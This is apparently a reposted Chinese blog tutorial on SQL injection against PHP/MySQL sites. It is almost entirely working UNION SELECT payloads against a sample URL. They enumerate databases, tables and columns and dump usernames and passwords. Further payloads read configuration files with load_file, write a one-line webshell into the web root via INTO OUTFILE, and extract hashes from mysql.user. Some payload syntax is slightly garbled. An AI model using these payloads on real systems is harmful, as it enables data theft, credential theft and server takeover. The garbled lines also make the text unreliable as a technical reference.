php+mysql注入

时间：2016-03-01 00:36:05 阅读：252 评论：0 收藏：0 [点我收藏+]

标签：

注入用到的SQL函数：

注入流程：

判断是否有注入：http:www.cc.com/show.php?id=1
order by来获取列数:比如是5
然后UNION SELECT来获取信息：http:www.cc.com/show.php?id=1 and 1=2 UNION SELECT 1,2,3,4,5 --（看报错的位置，比如爆出2,3,4,5）
然后获取版本号、数据库名、当前用户、操作系统等信息；http://www.cc.com/show.php?id=1 UNION SELECT 1,version(),database(),user(),@@version_compile_os --
然后爆表名：http://www.cc.com/show.php?id=1 UNION SELECT 1,table_name,4,5 from information_schema.tables where table_schema=hex(数据库名）,如果全部爆出表名，那么应该为group_concat(table_name);
然后爆列名：http:www.cc.com/show.php?id=1 UNION SELECT 1,2,column_name ,4,5 from information_schema.schema.columns where table_name=hex(表名）;全部爆出列名用group_concat(column_name)；
最后爆字段：http:www.cc.com/show.php?id=1 UNION SELECT 1,用户名，3，密码,5 from 表名.

总结:

　　数据库名：

　　　　　　表名：

　　　　　　　　列名：

　　　　　　　　　　最后爆字段:

权限下注入入侵

获取网站根路径：

举例：

通过上面获取网站根目录:例如 D:/web/www/index.php；
查看文件获取相关信息：http://www.cc.com/show.php?id=1 and 1=2 UNION SELECT 1,2, load_file(‘D:/web/www/index.php‘),4,5 --
查看php中数据库的文件:尝试 conn.php common.php config.php或者通过扫描器爬行有哪些文件，如：http://www.cc.com/conn.php没有报错，但是没有显示信息；
然后通过http://www.cc.com/show.php?id=1 and 1=2 UNION SELECT 1,2,load_file(‘D:/web/www/con.php‘),4,5 --
注意load_file文件中如果不用单引号，则必须用hex进行编码。
导出一句话拿webshell:http://www.cc.com/show.php?id=1 and 1=2 UNION SELECT 1,2, ‘一句话木马‘,4,5 into outfile ‘D:/web/www/manage/upload/img/1.php‘(网站路径，这里获取是可以扫描，还是？）
获取数据库账号和密码：http://www.cc.com/show.php?id=1 and 1=2 UNION SELECT 1,2,3,password,5 from mysql.user;

标签：

原文地址：http://www.cnblogs.com/blacksunny/p/5229270.html

踩

(0)

评论一句话评论（0）

分享档案

更多>

周排行